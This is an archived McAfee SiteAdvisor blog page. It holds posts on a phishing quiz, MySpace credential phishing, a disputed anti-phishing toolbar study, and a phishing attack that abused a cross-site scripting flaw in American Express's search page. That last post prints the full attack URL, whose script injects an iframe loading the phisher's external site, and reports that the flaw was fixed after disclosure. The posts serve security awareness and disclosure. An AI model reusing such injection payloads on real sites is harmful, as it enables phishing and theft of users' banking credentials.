McAfee SiteAdvisor Blog

Update:

Thanks to the hundreds of thousands of people who took our phishing quiz. We're now examining the results. Look for more interactive features from McAfee in the future!

Can you spot the phish?

How well can you spot phishing sites? Many of the readers of this blog are pretty savvy when it comes to security issues. So, we’ve created a deceptively easy but devilishly hard 10-question phishing quiz. Are you up to the challenge?

Our Phishing Quiz follows on the heels of our Spyware and Spam quizzes. More than 120,000 test results later, we can safely say that we have a lot of work left to do. The average score for the spyware quiz was 59%. For the spam quiz, 55%.

MailFrontier published the first phishing quiz back in 2004. Given the persistence and mutability of this plague, we thought it was time to revisit the issue. Whether it's rockphishing, or Flash phish or MySpace scams, phishing continues to evolve and ensnare both the ignorant – the people who don’t know better – and the arrogant – the people who should know better. And victims continue to lose real money. According to Gartner, per victim losses soared from $257 in 2004 to $1,244 in 2006. That’s nearly a 5-fold increase.

We encourage folks to share the quiz with friends and family. Use your expertise and the opportunity presented by the quiz to share some of our hard earned collective knowledge about phishing. Who knows? We might even save a few people from getting hooked.

Permalink | Comments (4) | TrackBacks (0)

Breaking into someone else's MySpace account has gotten a lot of press recently, with a nasty fight between celebrity hotties Shanna Moakler, Lindsay Lohan, and Paris Hilton. But assuming you're not Paris, why would anyone want your MySpace password? And assuming you're smarter than Paris and don't use your dog's name, how would they get that password?

Well, they'd want it for a number of reasons. One would be to spam your friends through the MySpace comment and message system-- people are far more likely to open a message if it appears to come from a friend or acquaintance, after all. They can also use your MySpace profile to direct your friends and acquaintances to dangerous or unscrupulous websites. Finally, they can try your username and password combination on other websites: maybe myspace.com/secretlyironic has the same password as secretlyironic@yahoo.com, and maybe there's a bank account with that same user name and password. We don't have to tell you what happens then.

To start harvesting passwords, an attacker starts with a fake profile of their own, and begins collecting friends and posting on messageboards to attract traffic to the profile. As we discussed in an earlier post, it's easy enough to overlay a transparent image on a page like this one (Replace the word 'colon' to visit this page. We recommend using a virtual machine to visit.) Clicks can then direct readers to any site you like. Password thieves will use that trick to get victims to a page that looks exactly like a MySpace login screen, and prompt them to login. When they do, they'll end up back at the MySpace home page, apparently logged in. It looks like an accidental logout, but it's not: they've just handed their credentials to a stranger.

About 90% of the phishing sites we find and flag as red are aimed at MySpace, and many of them have names designed to look like MySpace-related URLs: loginyspace, myspacev, and rmnyspacies, and so forth. They also come and go quickly-- none of those sites even exists right now.

To avoid getting caught, always double-check the URL when you get an unexpected login prompt. To minimize damage if you do get hacked, use different passwords for your social networking account and your bank account, and report any unauthorized access immediately.

Permalink | Comments (9) | TrackBacks (0)

Really

Microsoft commissioned a study that hit the wires today, ranking a number of well-known, popular anti-phishing toolbars. And SiteAdvisor.

Despite the fact that we're not an anti-phishing toolbar, despite the fact that we explictly say we don't offer phishing protection, SiteAdvisor was included in the study. Guess what happened.

We lost.

Of the 200 test sites, we got 3 right. Netscape 8.1, the next closest "competitor" to SiteAdvisor, got 56 correct. Microsoft's IE7 beat the popular Netcraft by a whisker, 172 to 168.

A score 18 times worse than the next nearest competitor should have been a clue to the study's authors that something was wrong. Oh well. We suppose the study needed some comic relief to take away from the fact that a study that finds its paid sponsor to be the best at something is more of an ad than a study.

A score of 1.5% correct would indeed be shockingly bad, if, in fact, we tested sites for phishing. But we don’t. There are a couple of places on our site where we make that clear. On our support pages, we've answered "Does SiteAdvisor offer 'phishing' protection?" nearly 2,000 times, each time the same way:

SiteAdvisor's software does not currently provide automated or real-time phishing detection.

On a July 28 blog entry about an American Express related phish attack, we said it again:

A quick note. We wanted to remind readers that McAfee's SiteAdvisor plug-in warns users about a wide range of site-based threats including spyware, spam and exploits, but for anti-phishing and more complete threat protection, readers should look at our award winning security suites.

Comparing SiteAdvisor's anti-phishing efficacy with Netcraft's or IE7's is like comparing our restaurant ratings to Zagat's. Or comparing IE7's (non-existent) spam, spyware, exploit, link practice, and pop-up analysis with McAfee SiteAdvisor's.

That's part of the point. SiteAdvisor has focused on these kinds of analyses because no one else has. By contrast, there is a lot of good anti-phishing software on the market today. Oddly enough, the study didn’t bother to test McAfee's actual anti-phishing tools, included in our Internet Security and Total Protection Suites.

For the record: SiteAdvisor doesn't include anti-phishing protection. If and when it does, we promise it will be great, and that we'll let you know about it.

Permalink | Comments (10) | TrackBacks (0)

Phisher takes advantage of American Express mistake

Earlier this week, Dan Nunes, one of our software engineers, was reviewing a phishing feed when he noticed a link that pointed to americanexpress.com. At first, Dan was surprised that a financial institution would be so careless as to leave an unprotected redirect on its site. After all, financial institutions are often the targets of such phishing attacks. Upon closer examination of the link, however, he noticed javascript code present within the URL. The code appeared to load a frame to another site, www.cgieich.com, which at the time of this writing was mimicking the site of an Italian bank, Banka Intesa:

The need for legitimacy

A while back, we wrote an article examining the economics of phishing. In the piece, we allude to the fact that ideally, phishers like to hijack real sites to transmit stolen data back to themselves. It is not uncommon for a phisher to utilize Google or Yahoo redirects to make a link look more legitimate. Sites often use these "open redirects" to keep track of what links a user visits on their site by directing the user through a script on the host site before directing them to another site. Phishing attacks of this nature are often easy for a consumer to identify because even though the link that was clicked looked like it was going to Google, for example, the address bar will indicate that the site that eventually loaded was not in fact Google.

The basic definition of a phisher is someone who attempts to con users into providing personal or financial information to a fake site under the auspices that they are interacting with a legitimate site. A fundamental tenet of phishing is that the more legitimate the site looks, the more people will be convinced to provide their information. What we saw on the feed was troubling in that regard.

Scripting for profit

Take a look at this:

http://search.americanexpress.com/amex/?q=%3Cscript%3Edocument.write%28%22%3C iframe+src%3D%27http%3A%2F%2Fwww.cgieicg.com%27+FRAMEBORDER%3D%270%27+WIDTH%3D% 27800%27+HEIGHT%3D%27640%27+scrolling%3D%27auto%27%3E%3C%2Fiframe%3E%22%29%3C%2F script%3E&site=amerexpress&client=amerexpress&output=amerexpress&restrict=US

The link itself points to the search results page on the American Express website. Dan found that the vulnerability arises from the fact that the query string passed to the search is displayed within the resulting page. Phishers exploited this fact to insert their own code onto the page. Since the resulting page appears to be a legitimate page within the American Express site, an unsuspecting user that fails to notice the "Search results" heading on the page or the formatting errors may be fooled into thinking he or she is sending information to a legitimate banking portal.

This vulnerability is especially glaring when one considers the fact that virtually any script could have been executed by this method. A phisher could have created a fake login form for American Express itself, leaving little clue that a user was giving his or her information to a third party. Slightly altering the link, Dan notes, can change the page that is loaded:

Before running this article, Dan contacted the anti-phishing group at American Express and they have since fixed the vulnerability. Unfortunately, the average consumer that engages in online banking can not even trust that legitimate sites are not inadvertently aiding phishers in their fraudulent collection of consumer information. Fortunately, one hurdle that phishers face is that they need to deliver their unsafe links to the consumers to get them to visit the fraudulent sites. Thanks in a large part to the banking institutions that have gone to great lengths in order to educate their customers about the dangers of phishing and ways to identify possible fraudulent sites, consumers are getting smarter about remaining skeptical of any link received through e-mails. By making sure only to provide personal information to sites received from a trusted source, and utilizing the free services of SiteAdvisor to aid in identifying potentially dangerous sites, consumers can stay safe amid the daily hazards of the web.

Update

A quick note. We wanted to remind readers that McAfee's SiteAdvisor plug-in warns users about a wide range of site-based threats including spyware, spam and exploits, but for anti-phishing and more complete threat protection, readers should look at our award winning security suites.

Permalink | Comments (2) | TrackBacks (0)